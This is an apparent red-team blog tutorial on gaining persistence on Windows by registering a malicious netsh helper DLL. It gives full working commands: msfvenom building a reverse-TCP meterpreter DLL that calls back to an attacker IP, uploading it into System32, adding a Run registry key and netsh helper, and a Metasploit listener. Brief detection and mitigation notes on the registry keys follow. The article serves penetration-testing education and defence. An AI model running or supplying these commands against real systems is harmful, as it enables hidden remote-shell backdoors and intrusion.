Red Teaming

Windows Persistence using Netsh

In this article, we are going to describe the ability of the Netsh process to provide persistent access to the Target Machine.

Table of Content

  • Introduction
  • Configurations used in Practical
  • Crafting Payload
  • Payload Transfer
  • Twerking Registry
  • Listener Configuration & Gaining Persistence
  • Detection
  • Mitigation

Introduction

Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh also provides a scripting feature that allows you to run a group of commands in batch mode against a specified computer. Netsh can also save a configuration script in a text file for archival purposes or to help you configure other servers.

Netsh contains functionality to add helper DLLs for extending the functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.

Before we move on to gaining the persistence on the system, keep in mind that we have already compromised the system using well-known methods. Read about them here.

Configurations used in Practical

Attacker:

  • OS: Kali Linux 2020.1
  • IP:168.1.112

Target:

  • OS: Windows 10
  • IP:168.1.104

Crafting Payload

From the Introduction, it is clear that the Netsh helper can execute DLL files. So, if we are planning on using the netsh to compromise the Target Machine and gain a persistence shell, we will be needing a malicious DLL file. We used the msfvenom for creating the payload. The System that we compromised using other methods was an x64 bit version. This is easier to find for the systeminfo command.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.112 lport=1234 -f dll > raj.dll

Payload Transfer

Since we already have a meterpreter on the target system, we need to transfer the payload we crafted to the Target Machine. We are transferring the payload to the System32 directory as almost all of the DLL files are stored there. This is merely a way to hide into plain sight but, it requires the elevated privileges on the Target Machine. We can store the malicious DLL file at some other location as well all we will need is to twerk the location of the file while adding it in the registry. Back to the transfer of the payload. We used the upload command of the meterpreter for the transfer.

cd System32
upload /root/raj.dll .

Twerking Registry

We have successfully transferred the payload to the Target Machine. Now we need to pop up the Windows shell and make changes in the registry to include the file name in the Run and use the add helper command to load the DLL in the system.

shell
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v raj /t REG_SZ /d "C:\Windows\System32\netsh"
netsh add helper raj.dll

Listener Configuration & Gaining Persistence

Before moving to the Target System, we created a multi/handler listener with some configurations that we used while crafting the payload and we kept it ready for when the payload gets executed on the Target Machine resulting in a persistence shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 1234
exploit
sysinfo

The shell was generated in the netsh instance in no time. Let’s take a look at the changes we made in the registry to gain this persistence.

Detection

We made a key in the Run Hive with the name “raj” which contains the location of the netsh executable. This will run the netsh service on the Target Machine. As netsh is a pretty common service in the Server or Work Environment used by the System Administrator it is never suspecting for its entry in the Run.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Now we move to another location in the registry. When we run the add helper command in the netsh a registry key is created with the same name as the DLL. This can be seen at this location in the registry.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh

Mitigation

  • Occasionally scan the registry at the following locations:
    • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
  • Keep an eye out for registry changes made using any kind of shell (WMIC, Command Prompt, PowerShell)

That’s all for netsh persistence. No service is safe. Keep an eye out for all kinds of services even those which seem harmless.

Using Netsh

NetShell Helpers

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn